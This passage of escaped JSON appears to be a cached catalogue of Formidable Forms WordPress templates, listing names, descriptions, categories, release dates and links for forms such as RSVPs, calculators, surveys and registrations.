Operations\",\"Twilio\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/sms-get-quote-form\\/\",\"icon\":false,\"key\":\"sms-get-quote\",\"is_new\":false},\"20872681\":{\"name\":\"Contact Form to SMS Template\",\"slug\":\"contact-form-to-sms-template\",\"description\":\"Perfect for a simple contact form. Visitors ask a question and receive an instant SMS text message confirmation.\",\"id\":20872681,\"released\":\"2019-01-01 16:11:52\",\"categories\":[\"Business\",\"Contact\",\"Twilio\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/contact-form-to-sms-template\\/\",\"icon\":false,\"key\":\"contact-form-to-sms\",\"is_new\":false},\"22152282\":{\"name\":\"Customer Service Survey Template\",\"slug\":\"customer-service-survey-template\",\"description\":\"Transform your business with insightful customer service surveys.\",\"id\":22152282,\"released\":\"2020-05-18 13:31:13\",\"categories\":[\"Business\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/customer-service-survey-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2020\\/05\\/customer-service-survey-form-template.jpg\",650,288,false],\"key\":\"customer-service-survey\",\"is_new\":false},\"25188491\":{\"name\":\"Student Interest Survey Template\",\"slug\":\"student-interest-survey-form\",\"description\":\"Get feedback from your students using our Interest Survey Form.\",\"id\":25188491,\"released\":\"2020-06-10 22:05:36\",\"categories\":[\"Education\",\"Personal\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/student-interest-survey-form\\/\",\"icon\":false,\"key\":\"student-interest-survey\",\"is_new\":false},\"28036516\":{\"name\":\"Suggestion Form Template\",\"slug\":\"suggestion-form\",\"description\":\"Get valuable feedback from your customers with this suggestion form.\",\"id\":28036516,\"released\":\"2020-12-18 14:00:06\",\"categories\":[\"Feedback\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/suggestion-form\\/\",\"icon\":false,\"key\":\"suggestion\",\"is_new\":false},\"28036517\":{\"name\":\"Employee Referral Form Template\",\"slug\":\"employee-referral-form\",\"description\":\"Let your current staff refer their friends and family to work for you with this employee referral template\",\"id\":28036517,\"released\":\"2020-12-18 14:07:13\",\"categories\":[\"Business Operations\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-referral-form\\/\",\"icon\":false,\"key\":\"employee-referral\",\"is_new\":false},\"20907785\":{\"name\":\"Age Calculator Form Template\",\"slug\":\"age-calculator-form\",\"description\":\"Get an age calculator that tells you your age down to the day!\",\"id\":20907785,\"released\":\"2019-11-24 23:00:10\",\"categories\":[\"Calculator\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/age-calculator-form\\/\",\"icon\":false,\"key\":\"age-calculator\",\"is_new\":false},\"20907787\":{\"name\":\"Compound Interest Calculator Template\",\"slug\":\"compound-interest-calculator-form\",\"description\":\"Calculate total compound interest on an investment or loan.\",\"id\":20907787,\"released\":\"2019-11-24 23:00:57\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/compound-interest-calculator-form\\/\",\"icon\":false,\"key\":\"compound-interest-calculator\",\"is_new\":false},\"20907788\":{\"name\":\"Final Grade Calculator Template\",\"slug\":\"final-grade-calculator-form\",\"description\":\"Calculate the grade needed on an exam to get the desired final score.\",\"id\":20907788,\"released\":\"2019-11-24 23:00:53\",\"categories\":[\"Calculator\",\"Education\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/final-grade-calculator-form\\/\",\"icon\":false,\"key\":\"final-grade-calculator\",\"is_new\":false},\"20907789\":{\"name\":\"Pregnancy Due Date Calculator Form Template\",\"slug\":\"pregnancy-due-date-calculator-form\",\"description\":\"Calculate the number of days until the baby due date.\",\"id\":20907789,\"released\":\"2019-11-24 23:00:32\",\"categories\":[\"Business\",\"Calculator\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/pregnancy-due-date-calculator-form\\/\",\"icon\":false,\"key\":\"pregnancy-due-date-calculator\",\"is_new\":false},\"20909862\":{\"name\":\"Wedding Party RSVP Form\",\"slug\":\"wedding-party-rsvp-form\",\"description\":\"Keep track of the number of guests for any wedding.\",\"id\":20909862,\"released\":\"2019-11-24 23:00:02\",\"categories\":[\"Basic\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/wedding-party-rsvp-form\\/\",\"icon\":false,\"key\":\"wedding-party-rsvp\",\"is_new\":false},\"20909863\":{\"name\":\"Simple RSVP Form\",\"slug\":\"simple-rsvp-form\",\"description\":\"A general RSVP form that can be used for any occasion.\",\"id\":20909863,\"released\":\"2019-11-24 23:00:57\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/simple-rsvp-form\\/\",\"icon\":false,\"key\":\"simple-rsvp\",\"is_new\":false},\"20909864\":{\"name\":\"Potluck Invitation RSVP Form\",\"slug\":\"potluck-invitation-rsvp-form\",\"description\":\"Keep track of who is coming and what they will bring to the next potluck.\",\"id\":20909864,\"released\":\"2019-11-24 23:00:43\",\"categories\":[\"Basic\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/potluck-invitation-rsvp-form\\/\",\"icon\":false,\"key\":\"potluck-invitation-rsvp\",\"is_new\":false},\"20909865\":{\"name\":\"Party Invitation RSVP Form\",\"slug\":\"party-invitation-rsvp-form\",\"description\":\"A simple form used for keeping track of party guests.\",\"id\":20909865,\"released\":\"2019-11-24 23:00:37\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/party-invitation-rsvp-form\\/\",\"icon\":false,\"key\":\"party-invitation-rsvp\",\"is_new\":false},\"20906055\":{\"name\":\"Prayer Request Form Template\",\"slug\":\"prayer-request-form\",\"description\":\"Help your remote congregation and shut-ins to connect with your church.\",\"id\":20906055,\"released\":\"2019-11-24 23:00:42\",\"categories\":[\"Basic\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/prayer-request-form\\/\",\"icon\":false,\"key\":\"prayer-request\",\"is_new\":false},\"20906058\":{\"name\":\"Travel Request Form Template\",\"slug\":\"travel-request-form\",\"description\":\"Provide a way for your employees to easily request travel arrangements for work.\",\"id\":20906058,\"released\":\"2019-11-24 23:00:06\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/travel-request-form\\/\",\"icon\":false,\"key\":\"travel-request\",\"is_new\":false},\"20906062\":{\"name\":\"Gym Registration Form Template\",\"slug\":\"gym-registration-form\",\"description\":\"Get clients signed up and registered for a gym membership.\",\"id\":20906062,\"released\":\"2019-11-24 23:00:45\",\"categories\":[\"Basic\",\"Health and Wellness\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/gym-registration-form\\/\",\"icon\":false,\"key\":\"gym-registration\",\"is_new\":false},\"20906063\":{\"name\":\"Vendor Contact Information Form Template\",\"slug\":\"vendor-contact-information-form\",\"description\":\"Track the vendors that you are working with and get their contact information.\",\"id\":20906063,\"released\":\"2019-11-24 23:00:17\",\"categories\":[\"Contact\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/vendor-contact-information-form\\/\",\"icon\":false,\"key\":\"vendor-contact-information\",\"is_new\":false},\"28036180\":{\"name\":\"Call for Proposals Form Template\",\"slug\":\"call-for-proposals-form\",\"description\":\"Putting out a call for proposals? Enhance your RFP process with a call for proposals form template! Now you can request proposals the easy way.\",\"id\":28036180,\"released\":\"2020-12-18 13:00:06\",\"categories\":[\"Business Operations\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/call-for-proposals-form\\/\",\"icon\":false,\"key\":\"call-for-proposals\",\"is_new\":false},\"20906069\":{\"name\":\"Vendor Registration Form Template\",\"slug\":\"vendor-registration-form\",\"description\":\"Gather information about new vendors that you are expecting for an event. \",\"id\":20906069,\"released\":\"2019-11-24 23:00:32\",\"categories\":[\"Basic\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/vendor-registration-form\\/\",\"icon\":false,\"key\":\"vendor-registration\",\"is_new\":false},\"28036184\":{\"name\":\"Personal Trainer Sign-Up Form Template\",\"slug\":\"personal-trainer-sign-up-form\",\"description\":\"Looking for a personal trainer sign-up form template? Make it easy for customers to get started with this personal training registration form.\",\"id\":28036184,\"released\":\"2020-12-18 13:00:00\",\"categories\":[\"free\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/personal-trainer-sign-up-form\\/\",\"icon\":false,\"key\":\"personal-trainer-sign-up\",\"is_new\":false},\"20908664\":{\"name\":\"Daily Calorie Intake Calculator Template\",\"slug\":\"daily-calorie-intake-calculator-form\",\"description\":\"Calculate the daily calorie intake required to reach fitness goals. \",\"id\":20908664,\"released\":\"2019-11-24 23:00:44\",\"categories\":[\"Business\",\"Calculator\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/daily-calorie-intake-calculator-form\\/\",\"icon\":false,\"key\":\"daily-calorie-intake-calculator\",\"is_new\":false},\"20908665\":{\"name\":\"Length Conversion Calculator Form Template\",\"slug\":\"length-conversion-calculator-form\",\"description\":\"Convert lengths across different units of measurement.\",\"id\":20908665,\"released\":\"2019-11-24 23:00:25\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/length-conversion-calculator-form\\/\",\"icon\":false,\"key\":\"length-conversion-calculator\",\"is_new\":false},\"20908666\":{\"name\":\"Paycheck Calculator Form Template\",\"slug\":\"paycheck-calculator-form\",\"description\":\"Find your salary, daily, weekly and monthly wages based on hourly rates.\",\"id\":20908666,\"released\":\"2019-11-24 23:00:26\",\"categories\":[\"Business\",\"Calculator\",\"Finance\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/paycheck-calculator-form\\/\",\"icon\":false,\"key\":\"paycheck-calculator\",\"is_new\":false},\"20908668\":{\"name\":\"Tip Calculator Form Template\",\"slug\":\"tip-calculator-form\",\"description\":\"Calculate a tip whether splitting the bill or paying alone.\",\"id\":20908668,\"released\":\"2019-11-24 23:00:34\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/tip-calculator-form\\/\",\"icon\":false,\"key\":\"tip-calculator\",\"is_new\":false},\"20905853\":{\"name\":\"Contest Entry Form Template\",\"slug\":\"contest-entry-form\",\"description\":\"Easily collect entries by promoting participation in a contest.\",\"id\":20905853,\"released\":\"2019-11-24 23:00:23\",\"categories\":[\"Basic\",\"Marketing\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/contest-entry-form\\/\",\"icon\":false,\"key\":\"contest-entry\",\"is_new\":false},\"20905855\":{\"name\":\"Equipment Checkout Form Template\",\"slug\":\"equipment-checkout-form\",\"description\":\"Collect employee details and information about the equipment being checked out.\",\"id\":20905855,\"released\":\"2019-11-24 23:00:10\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/equipment-checkout-form\\/\",\"icon\":false,\"key\":\"equipment-checkout\",\"is_new\":false},\"20905857\":{\"name\":\"Online Event Registration Form Template\",\"slug\":\"online-event-registration-form\",\"description\":\"Allow users to register to attend a conference.\",\"id\":20905857,\"released\":\"2019-11-24 23:00:14\",\"categories\":[\"Basic\",\"Event Planning\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/online-event-registration-form\\/\",\"icon\":false,\"key\":\"online-event-registration\",\"is_new\":false},\"20905877\":{\"name\":\"Cancellation Survey Form Template\",\"slug\":\"cancellation-survey-form\",\"description\":\"Ask clients why they are canceling and how you can improve.\",\"id\":20905877,\"released\":\"2019-11-24 23:00:34\",\"categories\":[\"Business\",\"Business Operations\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/cancellation-survey-form\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2019\\/11\\/cancellation-survey-form-template.jpg\",650,288,false],\"key\":\"cancellation-survey\",\"is_new\":false},\"20905879\":{\"name\":\"Conference Registration Form Template\",\"slug\":\"conference-registration-form\",\"description\":\"Easily register attendees for a conference.\",\"id\":20905879,\"released\":\"2019-11-24 23:00:27\",\"categories\":[\"Business\",\"Event Planning\",\"Payment\",\"Registration and Signup\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/conference-registration-form\\/\",\"icon\":false,\"key\":\"conference-registration\",\"is_new\":false},\"20905880\":{\"name\":\"Family Reunion Registration Form Template\",\"slug\":\"family-reunion-registration-form\",\"description\":\"Register each family member for a reunion.\",\"id\":20905880,\"released\":\"2019-11-24 23:00:20\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/family-reunion-registration-form\\/\",\"icon\":false,\"key\":\"family-reunion-registration\",\"is_new\":false},\"20905881\":{\"name\":\"Church Membership Form Template\",\"slug\":\"church-membership-form\",\"description\":\"Gather contact information from new church members.\",\"id\":20905881,\"released\":\"2019-11-24 23:00:02\",\"categories\":[\"Basic\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/church-membership-form\\/\",\"icon\":false,\"key\":\"church-membership\",\"is_new\":false},\"20909980\":{\"name\":\"Work Order Request Form\",\"slug\":\"work-order-request-form\",\"description\":\"A powerful form for keeping track of work orders and requests for maintenance from employees or tenants.\",\"id\":20909980,\"released\":\"2019-11-24 23:00:02\",\"categories\":[\"Basic\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/work-order-request-form\\/\",\"icon\":false,\"key\":\"work-order-request\",\"is_new\":false},\"28036515\":{\"name\":\"Content Download Form Template\",\"slug\":\"content-download-form\",\"description\":\"Use this simple form to capture leads for your business.\",\"id\":28036515,\"released\":\"2020-12-18 13:30:20\",\"categories\":[\"Customer Service\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/content-download-form\\/\",\"icon\":false,\"key\":\"content-download\",\"is_new\":false},\"20908978\":{\"name\":\"Gift Card Order Form Template\",\"slug\":\"gift-card-order-form\",\"description\":\"Sell gift cards to your customers to broaden your customer base.\",\"id\":20908978,\"released\":\"2019-11-24 23:00:42\",\"categories\":[\"Business\",\"Marketing\",\"Order Form\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/gift-card-order-form\\/\",\"icon\":false,\"key\":\"gift-card-order\",\"is_new\":false},\"20909235\":{\"name\":\"Amortization Calculator Template\",\"slug\":\"amortization-calculator-form\",\"description\":\"Estimate monthly mortgage payment principal and interest amounts.\",\"id\":20909235,\"released\":\"2019-11-24 23:00:38\",\"categories\":[\"Business\",\"Calculator\",\"Finance\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/amortization-calculator-form\\/\",\"icon\":false,\"key\":\"amortization-calculator\",\"is_new\":false},\"20908980\":{\"name\":\"Event Feedback Template\",\"slug\":\"event-feedback-form\",\"description\":\"Get the opinions of event attendees so you can grow your business.\",\"id\":20908980,\"released\":\"2019-11-24 23:00:08\",\"categories\":[\"Feedback\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/event-feedback-form\\/\",\"icon\":false,\"key\":\"event-feedback\",\"is_new\":false},\"20909236\":{\"name\":\"Debt to Income Ratio Calculator Form Template\",\"slug\":\"debt-to-income-ratio-calculator-form\",\"description\":\"Check for a healthy debt to income ratio before starting a loan.\",\"id\":20909236,\"released\":\"2019-11-24 23:00:10\",\"categories\":[\"Calculator\",\"Finance\",\"Personal\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/debt-to-income-ratio-calculator-form\\/\",\"icon\":false,\"key\":\"debt-to-income-ratio-calculator\",\"is_new\":false},\"20909237\":{\"name\":\"Life Insurance Calculator Template\",\"slug\":\"life-insurance-calculator-form\",\"description\":\"Offer accurate life insurance estimates with this calculator. \",\"id\":20909237,\"released\":\"2019-11-24 23:00:21\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/life-insurance-calculator-form\\/\",\"icon\":false,\"key\":\"life-insurance-calculator\",\"is_new\":false},\"20909238\":{\"name\":\"ROI Calculator Form Template\",\"slug\":\"roi-calculator-form\",\"description\":\"Estimate the profit or loss on an investment as a simple percentage.\",\"id\":20909238,\"released\":\"2019-11-24 23:00:47\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/roi-calculator-form\\/\",\"icon\":false,\"key\":\"roi-calculator\",\"is_new\":false},\"20909239\":{\"name\":\"Savings and Investment Calculator Form Template\",\"slug\":\"savings-and-investment-calculator-form\",\"description\":\"Estimate profit from an investment or savings account.\",\"id\":20909239,\"released\":\"2019-11-24 23:00:37\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/savings-and-investment-calculator-form\\/\",\"icon\":false,\"key\":\"savings-and-investment-calculator\",\"is_new\":false},\"20908990\":{\"name\":\"Maintenance Request Form Template\",\"slug\":\"maintenance-request-form\",\"description\":\"Streamline the process of dealing with maintenance requests.\",\"id\":20908990,\"released\":\"2019-11-24 23:00:29\",\"categories\":[\"Basic\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/maintenance-request-form\\/\",\"icon\":false,\"key\":\"maintenance-request\",\"is_new\":false},\"20908991\":{\"name\":\"Accident Report Form Template\",\"slug\":\"accident-report-form\",\"description\":\"An easy way to document accidents that happen at the office or on job sites\",\"id\":20908991,\"released\":\"2019-11-24 23:00:38\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/accident-report-form\\/\",\"icon\":false,\"key\":\"accident-report\",\"is_new\":false},\"20908992\":{\"name\":\"Summer Camp Registration Form Template\",\"slug\":\"summer-camp-registration-form\",\"description\":\"An easier way for parents to register their kids for summer camp\",\"id\":20908992,\"released\":\"2019-11-24 23:00:11\",\"categories\":[\"Application\",\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/summer-camp-registration-form\\/\",\"icon\":false,\"key\":\"summer-camp-registration\",\"is_new\":false},\"20908993\":{\"name\":\"Change Request Form Template\",\"slug\":\"change-request-form\",\"description\":\"Looking for a change request form template? Take your project management to a whole new level! Manage project details effectively with this easy to use form.\",\"id\":20908993,\"released\":\"2019-11-24 23:00:07\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/change-request-form\\/\",\"icon\":false,\"key\":\"change-request\",\"is_new\":false},\"20908994\":{\"name\":\"Complaint Form Template\",\"slug\":\"complaint-form\",\"description\":\"A better way to allow customers to submit their complaints.\",\"id\":20908994,\"released\":\"2019-11-24 23:00:11\",\"categories\":[\"Basic\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/complaint-form\\/\",\"icon\":false,\"key\":\"complaint\",\"is_new\":false},\"20908995\":{\"name\":\"Time Sheet Template\",\"slug\":\"time-sheet-form\",\"description\":\"An effective way of keeping track of employee hours each week.\",\"id\":20908995,\"released\":\"2019-11-24 23:00:11\",\"categories\":[\"Business Operations\",\"Calculator\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/time-sheet-form\\/\",\"icon\":false,\"key\":\"time-sheet\",\"is_new\":false},\"20908997\":{\"name\":\"Home Buyer Feedback Form Template\",\"slug\":\"home-buyer-feedback-form\",\"description\":\"Ask prospective customers what they are looking for in a real estate professional, and a new home\",\"id\":20908997,\"released\":\"2019-11-24 23:00:36\",\"categories\":[\"Feedback\",\"Personal\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/home-buyer-feedback-form\\/\",\"icon\":false,\"key\":\"home-buyer-feedback\",\"is_new\":false},\"20908998\":{\"name\":\"Parental Consent Template\",\"slug\":\"parental-consent-form\",\"description\":\"Document parental permission before going on a field trip.\",\"id\":20908998,\"released\":\"2019-11-24 23:00:47\",\"categories\":[\"Education\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/parental-consent-form\\/\",\"icon\":false,\"key\":\"parental-consent\",\"is_new\":false},\"20910309\":{\"name\":\"House Inventory Form\",\"slug\":\"house-inventory-form\",\"description\":\"A simple form to keep track of household items, as well as value, condition, and make\\/model numbers.\",\"id\":20910309,\"released\":\"2019-11-24 23:00:57\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/house-inventory-form\\/\",\"icon\":false,\"key\":\"house-inventory\",\"is_new\":false},\"28030949\":{\"name\":\"T-Shirt Order Form Template\",\"slug\":\"t-shirt-order-form\",\"description\":\"Let customers select and order multiple t-shirts in the colors and sizes the want.\",\"id\":28030949,\"released\":\"2020-11-23 00:00:49\",\"categories\":[\"Business\",\"Calculator\",\"Order Form\",\"Payment\",\"PayPal\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/t-shirt-order-form\\/\",\"icon\":false,\"key\":\"t-shirt-order\",\"is_new\":false},\"20910310\":{\"name\":\"Dinner Reservation Form\",\"slug\":\"dinner-reservation-form\",\"description\":\"Simply take reservations at a restaurant.\",\"id\":20910310,\"released\":\"2019-11-24 23:00:43\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/dinner-reservation-form\\/\",\"icon\":false,\"key\":\"dinner-reservation\",\"is_new\":false},\"20874734\":{\"name\":\"B2B Leads Form Template\",\"slug\":\"b2b-leads-form\",\"description\":\"Expand your clientele and increase revenue by bridging the gap between you and your customers.\",\"id\":20874734,\"released\":\"2019-01-01 13:09:59\",\"categories\":[\"Business\",\"Contact\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/b2b-leads-form\\/\",\"icon\":false,\"key\":\"b2b-leads\",\"is_new\":false},\"20905713\":{\"name\":\"Order\\/Billing Form Template\",\"slug\":\"order-billing-form\",\"description\":\"A simple order form to start collecting payments fast.\",\"id\":20905713,\"released\":\"2019-11-24 23:00:32\",\"categories\":[\"Business\",\"Calculator\",\"Order Form\",\"Payment\",\"PayPal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/order-billing-form\\/\",\"icon\":false,\"key\":\"order-billing\",\"is_new\":false},\"20909555\":{\"name\":\"New Years Party RSVP Form\",\"slug\":\"new-years-party-rsvp-form\",\"description\":\"Provides an easy way to keep tack of guests of an upcoming New Years Party.\",\"id\":20909555,\"released\":\"2019-11-24 23:00:01\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/new-years-party-rsvp-form\\/\",\"icon\":false,\"key\":\"new-years-party-rsvp\",\"is_new\":false},\"20909556\":{\"name\":\"Birthday Party RSVP Form\",\"slug\":\"birthday-party-invitation-rsvp-form\",\"description\":\"A simple form to keep track of who\'s coming to a Birthday celebration.\",\"id\":20909556,\"released\":\"2019-11-24 23:00:40\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/birthday-party-invitation-rsvp-form\\/\",\"icon\":false,\"key\":\"birthday-party-invitation-rsvp\",\"is_new\":false},\"20909557\":{\"name\":\"Baseball League Registration Form\",\"slug\":\"baseball-league-registration-form\",\"description\":\"A simple form for registering players for a baseball league including positions, team, and more.\",\"id\":20909557,\"released\":\"2019-11-24 23:00:05\",\"categories\":[\"Basic\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/baseball-league-registration-form\\/\",\"icon\":false,\"key\":\"baseball-league-registration\",\"is_new\":false},\"20905719\":{\"name\":\"Rent Receipt Form Template\",\"slug\":\"rent-receipt-form\",\"description\":\"Track tenant payment information using the rent receipt form.\",\"id\":20905719,\"released\":\"2019-11-24 23:00:00\",\"categories\":[\"Business Operations\",\"Personal\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/rent-receipt-form\\/\",\"icon\":false,\"key\":\"rent-receipt\",\"is_new\":false},\"20909560\":{\"name\":\"Football League Registration Form Template\",\"slug\":\"football-league-registration-form\",\"description\":\"An easy form for registering players for a football league including positions, desired team, and other information.more\",\"id\":20909560,\"released\":\"2019-11-24 23:00:55\",\"categories\":[\"Basic\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/football-league-registration-form\\/\",\"icon\":false,\"key\":\"football-league-registration\",\"is_new\":false},\"20905720\":{\"name\":\"Request A Quote Form Template\",\"slug\":\"request-a-quote-form\",\"description\":\"Get information from potential customers who are requesting for a quote on your services.\",\"id\":20905720,\"released\":\"2019-11-24 23:00:18\",\"categories\":[\"Business Operations\",\"Contact\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/request-a-quote-form\\/\",\"icon\":false,\"key\":\"request-a-quote\",\"is_new\":false},\"20909562\":{\"name\":\"Poll Form\",\"slug\":\"poll-form\",\"description\":\"A simple way to take a poll of likes, dislikes, or favorites.\",\"id\":20909562,\"released\":\"2019-11-24 23:00:49\",\"categories\":[\"Personal\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/poll-form\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2019\\/11\\/poll-form-template.jpg\",650,288,false],\"key\":\"poll\",\"is_new\":false},\"20909563\":{\"name\":\"Enrollment Form Template\",\"slug\":\"enrollment-form\",\"description\":\"A form for quick and easy enrollment into a school system.\",\"id\":20909563,\"released\":\"2019-11-24 23:00:22\",\"categories\":[\"Basic\",\"Education\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/enrollment-form\\/\",\"icon\":false,\"key\":\"enrollment\",\"is_new\":false},\"20909564\":{\"name\":\"Recipe Catalog Form Template\",\"slug\":\"recipe-catalog-form\",\"description\":\"Keep track of favorite recipes or create a conglomerate of those of friends and family.\",\"id\":20909564,\"released\":\"2019-11-24 23:00:24\",\"categories\":[\"free\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/recipe-catalog-form\\/\",\"icon\":false,\"key\":\"recipe-catalog\",\"is_new\":false},\"20909567\":{\"name\":\"Grade Book Form Template\",\"slug\":\"gradebook-form\",\"description\":\"Keep track of grades all in one place.\",\"id\":20909567,\"released\":\"2019-11-24 23:00:14\",\"categories\":[\"Education\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/gradebook-form\\/\",\"icon\":false,\"key\":\"gradebook\",\"is_new\":false},\"28036177\":{\"name\":\"Neighborhood Events Questionnaire Form Template\",\"slug\":\"neighborhood-events-questionnaire-form\",\"description\":\"Want to survey your neighbors to find out what events they are interested in? Do it the easy way - with this neighborhood events questionnaire!\",\"id\":28036177,\"released\":\"2020-12-18 12:55:07\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/neighborhood-events-questionnaire-form\\/\",\"icon\":false,\"key\":\"neighborhood-events-questionnaire\",\"is_new\":false},\"28036251\":{\"name\":\"Super Bowl Party RSVP Form Template\",\"slug\":\"super-bowl-party-rsvp-form\",\"description\":\"Planning a Super Bowl party? Make the biggest football game of the year EPIC with our Super Bowl Party RSVP form template!\",\"id\":28036251,\"released\":\"2020-12-18 12:56:26\",\"categories\":[\"Event Planning\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/super-bowl-party-rsvp-form\\/\",\"icon\":false,\"key\":\"super-bowl-party-rsvp\",\"is_new\":false},\"28036514\":{\"name\":\"Fitness Interest Form Template\",\"slug\":\"fitness-interest-form\",\"description\":\"Collect information about your next client with this fitness interest form.\",\"id\":28036514,\"released\":\"2020-12-18 13:25:25\",\"categories\":[\"free\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/fitness-interest-form\\/\",\"icon\":false,\"key\":\"fitness-interest\",\"is_new\":false},\"20908999\":{\"name\":\"Exercise Log Form Template\",\"slug\":\"exercise-log-form\",\"description\":\"Organize and monitor client workouts.\",\"id\":20908999,\"released\":\"2020-01-06 09:43:02\",\"categories\":[\"Business\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/exercise-log-form\\/\",\"icon\":false,\"key\":\"exercise-log\",\"is_new\":false},\"28036512\":{\"name\":\"Online Proposal Form Template\",\"slug\":\"online-proposal-form\",\"description\":\"Use this online proposal form, to gather the information needed to make decisions regarding projects that come your way.\",\"id\":28036512,\"released\":\"2020-12-18 13:12:05\",\"categories\":[\"Business Operations\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/online-proposal-form\\/\",\"icon\":false,\"key\":\"online-proposal\",\"is_new\":false},\"28036513\":{\"name\":\"Lecture Notes Form Template\",\"slug\":\"lecture-notes-form\",\"description\":\"Use the simple form to organize your lecture notes next time you come to class.\",\"id\":28036513,\"released\":\"2020-12-18 